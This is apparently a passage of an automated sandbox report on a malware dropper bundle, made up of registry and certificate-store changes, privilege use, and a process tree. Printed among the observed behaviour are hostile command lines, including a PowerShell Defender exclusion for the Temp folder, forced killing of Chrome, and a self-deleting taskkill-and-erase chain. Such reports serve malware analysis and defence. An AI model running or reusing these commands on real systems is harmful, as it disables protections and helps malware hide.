PublicKeyToken=b77a5c561934e089" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B718F0F8-E5E7-3651-A2BE-97009B568250}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{E6FBF496-6B15-3A23-A4D2-A2F7137C1216}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{CD6CB0A8-D6EF-33E8-888E-FE8C78CA568F}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A026E65F-9720-3F82-8DE1-A18E51180A34}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{20C6F4C2-80A8-4310-A59A-1CC487334236} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{2E05A70A-1BBE-31DF-B2A8-B8FA0F130915}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{DEAE387D-C9A7-3A9C-B772-0153A2538502}\4.0.0.0 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{215B68E5-0E78-4505-BE40-962EE3A0C379} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{82B28727-8F1B-3C0D-92A6-EBE9F1F4B8C4}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{A419B664-DABD-383D-A0DB-991487D41E14}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{566833C7-F4A0-30EE-BD7E-44752AD570E6}\4.0.0.0\Class = "System.Reflection.Emit.PropertyToken" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8CF0278D-D0AD-307D-BE63-A785432E3FDF}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B6B91160-2ABF-352B-A74D-1174CC324E18}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{4E9963B7-B2BF-4685-9378-8FEBEA364EF8}\InprocServer32\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB3127233 = "Servicing_Key" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB3143693 = "Servicing_Key" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB3086153 = "Servicing_Key" msiexec.exe -
Processes:
Thu161580bf75.exeThu167d514d2a7ac5a.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Thu161580bf75.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Thu161580bf75.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Thu167d514d2a7ac5a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5900000001000000120000005200530041002f00530048004100310000001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Thu167d514d2a7ac5a.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Thu16466b26f8b7.exeThu166f9a8bbe80.exeThu16f3de88a335950bb.tmpF6Ov3FAHfwyj7yenlzaqdNBa.exepid process 1628 Thu16466b26f8b7.exe 1628 Thu16466b26f8b7.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1372 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1372 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1372 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1372 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 1372 1372 1372 1372 1372 1372 856 Thu16f3de88a335950bb.tmp 856 Thu16f3de88a335950bb.tmp 1372 1372 1372 1372 1372 1372 1372 1372 1372 1372 1372 1372 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 1372 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 1372 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 1372 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 1372 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 1372 1372 -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
WerFault.exeWerFault.exeiexplore.exepid process 1372 3056 WerFault.exe 2232 WerFault.exe 2492 iexplore.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
Thu16466b26f8b7.exehhjjfdrhhjjfdrhhjjfdrpid process 1628 Thu16466b26f8b7.exe 2360 hhjjfdr 2164 hhjjfdr 1108 hhjjfdr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Thu165bd34b1e1d4d81.exeThu161580bf75.exepowershell.exe3720332.scrWerFault.exetaskkill.exeWerFault.exetaskkill.exetaskkill.exe8525018.scrThu164ba03be19.exe7042787.scr3321.exe2102080.scrSetup.exemsiexec.exedescription pid process Token: SeCreateTokenPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 1820 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 1820 Thu165bd34b1e1d4d81.exe Token: 31 1820 Thu165bd34b1e1d4d81.exe Token: 32 1820 Thu165bd34b1e1d4d81.exe Token: 33 1820 Thu165bd34b1e1d4d81.exe Token: 34 1820 Thu165bd34b1e1d4d81.exe Token: 35 1820 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1644 Thu161580bf75.exe Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 1372 Token: SeDebugPrivilege 1084 powershell.exe Token: SeShutdownPrivilege 1372 Token: SeDebugPrivilege 2252 3720332.scr Token: SeShutdownPrivilege 1372 Token: SeDebugPrivilege 2232 WerFault.exe Token: SeDebugPrivilege 2628 taskkill.exe Token: SeDebugPrivilege 3056 WerFault.exe Token: SeDebugPrivilege 2336 taskkill.exe Token: SeDebugPrivilege 2696 taskkill.exe Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 1372 Token: SeDebugPrivilege 2948 8525018.scr Token: SeShutdownPrivilege 1372 Token: SeDebugPrivilege 2340 Thu164ba03be19.exe Token: SeDebugPrivilege 2624 7042787.scr Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 1372 Token: SeDebugPrivilege 1136 3321.exe Token: SeDebugPrivilege 2840 2102080.scr Token: SeShutdownPrivilege 1372 Token: SeShutdownPrivilege 2616 Setup.exe Token: SeIncreaseQuotaPrivilege 2616 Setup.exe Token: SeRestorePrivilege 2644 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Thu16f3de88a335950bb.tmpiexplore.exepid process 856 Thu16f3de88a335950bb.tmp 2492 iexplore.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEpid process 2492 iexplore.exe 2492 iexplore.exe 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2144 IEXPLORE.EXE 2144 IEXPLORE.EXE 2144 IEXPLORE.EXE 2144 IEXPLORE.EXE 524 IEXPLORE.EXE 524 IEXPLORE.EXE 524 IEXPLORE.EXE 524 IEXPLORE.EXE 2908 IEXPLORE.EXE 2908 IEXPLORE.EXE 2908 IEXPLORE.EXE 2908 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.exedescription pid process target process PID 1080 wrote to memory of 860 1080 setup_x86_x64_install.exe setup_installer.exe PID 1080 wrote to memory of 860 1080 setup_x86_x64_install.exe setup_installer.exe PID 1080 wrote to memory of 860 1080 setup_x86_x64_install.exe setup_installer.exe PID 1080 wrote to memory of 860 1080 setup_x86_x64_install.exe setup_installer.exe PID 1080 wrote to memory of 860 1080 setup_x86_x64_install.exe setup_installer.exe PID 1080 wrote to memory of 860 1080 setup_x86_x64_install.exe setup_installer.exe PID 1080 wrote to memory of 860 1080 setup_x86_x64_install.exe setup_installer.exe PID 860 wrote to memory of 1696 860 setup_installer.exe setup_install.exe PID 860 wrote to memory of 1696 860 setup_installer.exe setup_install.exe PID 860 wrote to memory of 1696 860 setup_installer.exe setup_install.exe PID 860 wrote to memory of 1696 860 setup_installer.exe setup_install.exe PID 860 wrote to memory of 1696 860 setup_installer.exe setup_install.exe PID 860 wrote to memory of 1696 860 setup_installer.exe setup_install.exe PID 860 wrote to memory of 1696 860 setup_installer.exe setup_install.exe PID 1696 wrote to memory of 1660 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1660 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1660 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1660 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1660 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1660 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1660 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1468 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1468 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1468 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1468 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1468 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1468 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1468 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1568 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1568 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1568 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1568 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1568 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1568 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1568 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 948 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 948 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 948 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 948 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 948 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 948 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 948 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1916 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1176 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1176 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1176 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1176 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1176 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1176 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 1176 1696 setup_install.exe cmd.exe PID 1696 wrote to memory of 664 1696 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC5312776\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\F6Ov3FAHfwyj7yenlzaqdNBa.exe"C:\Users\Admin\Pictures\Adobe Films\F6Ov3FAHfwyj7yenlzaqdNBa.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 14246⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu16205451b994.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16205451b994.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu16205451b994.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3720332.scr"C:\Users\Admin\AppData\Roaming\3720332.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6537941.scr"C:\Users\Admin\AppData\Roaming\6537941.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2102080.scr"C:\Users\Admin\AppData\Roaming\2102080.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7042787.scr"C:\Users\Admin\AppData\Roaming\7042787.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8525018.scr"C:\Users\Admin\AppData\Roaming\8525018.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 9526⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-65035.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-65035.tmp\Thu16f3de88a335950bb.tmp" /SL5="$50134,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16f3de88a335950bb.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-4TDJI.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-4TDJI.tmp\Thu16f3de88a335950bb.tmp" /SL5="$60134,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu16f3de88a335950bb.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-QRM94.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-QRM94.tmp\postback.exe" ss19⤵
- Executes dropped EXE
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵
- Executes dropped EXE
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh10⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
